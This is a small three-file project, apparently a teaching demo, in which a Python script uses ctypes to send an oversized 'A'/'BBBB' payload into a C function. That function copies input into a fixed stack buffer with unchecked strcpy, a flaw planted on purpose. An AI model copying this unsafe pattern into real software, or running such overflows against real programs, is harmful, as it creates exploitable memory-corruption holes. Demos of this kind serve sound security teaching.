[
    {
        "file_name": "main.py",
        "file_content": "# main.py\n# This is the main file for the buffer overflow attack program.\n# It sets up the target buffer and calls the vulnerable function.\n\nimport ctypes\n\n# Load the shared library containing the vulnerable function\nlibc = ctypes.CDLL('./libvulnerable.so')\n\n# Define the buffer size\nBUFFER_SIZE = 100\n\n# Define the payload to overflow the buffer\npayload = b'A' * BUFFER_SIZE + b'BBBB'\n\n# Call the vulnerable function with the payload\nlibc.vulnerable_function(payload)\n\nprint(\"Buffer overflow attack executed.\")"
    },
    {
        "file_name": "vulnerable.c",
        "file_content": "// vulnerable.c\n// This file contains the vulnerable function that is susceptible to a buffer overflow attack.\n\n#include <stdio.h>\n#include <string.h>\n\n// Vulnerable function that does not check the length of the input\nvoid vulnerable_function(char *input) {\n    char buffer[100];\n    strcpy(buffer, input);\n    printf(\"Buffer content: %s\\n\", buffer);\n}"
    },
    {
        "file_name": "Makefile",
        "file_content": "# Makefile\n# This Makefile compiles the vulnerable C code into a shared library.\n\nall: libvulnerable.so\n\nlibvulnerable.so: vulnerable.o\n\tgcc -shared -o libvulnerable.so vulnerable.o\n\nvulnerable.o: vulnerable.c\n\tgcc -c vulnerable.c\n\nclean:\n\trm -f libvulnerable.so vulnerable.o"
    }
]